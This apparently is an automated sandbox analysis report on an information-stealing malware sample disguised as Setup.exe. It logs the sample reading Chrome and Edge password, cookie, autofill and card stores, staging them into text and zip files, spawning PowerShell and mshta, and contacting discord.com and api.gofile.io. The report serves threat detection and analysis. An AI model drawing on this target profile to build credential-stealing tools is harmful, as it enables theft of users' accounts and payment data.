Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\resources\app.asar VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\nikki3 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\nikki3\cookies.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\nikki3\cookies.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Passwords.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Passwords.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Autofills.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Autofills.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Cards.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Cards.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Downloads VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Downloads VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Downloads\AFWAAFRXKO.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Downloads\AFWAAFRXKO.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\IVHSHTCODI VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\IVHSHTCODI.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\MQAWXUYAIK.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\MQAWXUYAIK.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\importantfiles.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\NikkiCookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Directory queried: C:\Users\user\Documents Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417301 Sample: SecuriteInfo.com.Generic.JS... Startdate: 28/03/2024 Architecture: WINDOWS Score: 60 70 discord.com 2->70 72 api.gofile.io 2->72 82 Antivirus detection for URL or domain 2->82 10 SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe 179 2->10         started        14 Setup.exe 2->14         started        signatures3 process4 file5 56 C:\Users\user\AppData\Local\...\Setup.exe, PE32+ 10->56 dropped 58 C:\Users\user\AppData\Local\...\nsis7z.dll, PE32 10->58 dropped 60 C:\Users\user\AppData\Local\...\System.dll, PE32 10->60 dropped 62 12 other files (none is malicious) 10->62 dropped 84 Drops large PE files 10->84 16 Setup.exe 19 10->16         started        signatures6 process7 dnsIp8 64 api.gofile.io 151.80.29.83, 443, 49720, 49723 OVHFR Italy 16->64 66 198.50.129.180, 80 OVHFR Canada 16->66 68 discord.com 162.159.137.232, 443, 49721, 49722 CLOUDFLARENETUS United States 16->68 48 C:\Users\user\AppData\Roaming\...\Setup.exe, PE32+ 16->48 dropped 50 C:\Users\user\AppData\Local\...\webdata.db, SQLite 16->50 dropped 52 C:\Users\user\AppData\Local\...\passwords.db, SQLite 16->52 dropped 54 3 other files (1 malicious) 16->54 dropped 76 Drops PE files to the startup folder 16->76 78 Tries to harvest and steal browser information (history, passwords, etc) 16->78 80 Drops large PE files 16->80 21 cmd.exe 1 16->21         started        23 Setup.exe 1 16->23         started        26 cmd.exe 1 16->26         started        28 5 other processes 16->28 file9 signatures10 process11 dnsIp12 30 cmd.exe 1 21->30         started        32 conhost.exe 21->32         started        74 chrome.cloudflare-dns.com 162.159.61.3, 443, 49719 CLOUDFLARENETUS United States 23->74 34 powershell.exe 15 26->34         started        36 conhost.exe 26->36         started        38 powershell.exe 15 28->38         started        40 tasklist.exe 1 28->40         started        42 tasklist.exe 1 28->42         started        44 3 other processes 28->44 process13 process14 46 mshta.exe 30->46         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.159.61.3
 chrome.cloudflare-dns.com United States
13335 CLOUDFLARENETUS false
162.159.137.232
 discord.com United States
13335 CLOUDFLARENETUS false
151.80.29.83
 api.gofile.io Italy
16276 OVHFR false
198.50.129.180
 unknown Canada
16276 OVHFR false

Contacted Domains

Name IP Active
chrome.cloudflare-dns.com 162.159.61.3 true
discord.com 162.159.137.232 true
api.gofile.io 151.80.29.83 true